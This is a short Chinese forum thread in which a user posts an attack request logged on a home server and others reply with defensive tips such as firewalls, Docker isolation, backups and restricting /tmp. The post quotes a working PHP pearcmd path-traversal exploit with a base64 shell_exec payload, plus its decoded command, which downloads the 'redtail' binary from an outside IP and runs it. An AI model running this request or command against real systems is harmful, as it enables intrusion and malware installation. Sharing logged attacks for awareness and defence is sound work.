request: "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?
shell_exec(base64_decode("bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2Ft aSk7IHdnZXQgaHR0cDovLzQ1Ljk1LjE0Ny4yMzYvZG93bmxvYWQvcmVkdGFpbC54ODZfNjQ7IGN1 cmwgLU8gaHR0cDovLzQ1Ljk1LjE0Ny4yMzYvZG93bmxvYWQvcmVkdGFpbC54ODZfNjQ7IHJtIC1yZiAuc mVkdGFpbDsgbXYgcmVkdGFpbC54ODZfNjQgLnJlZHRhaWw7IGNobW9kICt4IC5yZWR0YWlsOyAuLy5yZWR0YWls")); ?>+/tmp/ohhellohttpserver.php HTTP/1.1",
mkdir -p /tmp/$(whoami) && cd /tmp/$(whoami); wget http://45.95.147.236/download/redtail.x86_64; curl -O http://45.95.147.236/download/redtail.x86_64; rm -rf .redtail; mv redtail.x86_64 .redtail; chmod +x .redtail; ./.redtail
每天都在往我的小主机里面搞事情,做好防护很重要。
1
RDannelOlivaw 2024-01-26 17:02:25 +08:00
什么意思,大佬帮忙解释下
|
2
pota 2024-01-26 17:09:26 +08:00
常见的注入。加一个防火墙吧
|
3
nodejsexpress 2024-01-26 18:15:13 +08:00
反正我都部署到 docker 里面,随便它折腾。数据一天 backup 一次
|
4
buffzty 2024-01-26 18:23:39 +08:00
只开一个 wireguard 端口 省心省事
|
5
yumusb 2024-01-26 18:51:37 +08:00
互联网中“互联”二字有何含义?
|
6
relife 2024-01-27 09:45:14 +08:00
用 acl 限制用户对/tmp 的访问,反正是服务用户又不是桌面用户。我服务器也被黑了好几次写到/tmp 下面
|
7
puputeju 2024-01-27 10:51:07 +08:00
这是被攻击了吗
|
8
FeranyDev 2024-01-27 12:03:18 +08:00
所有为什么还在用 PHP
|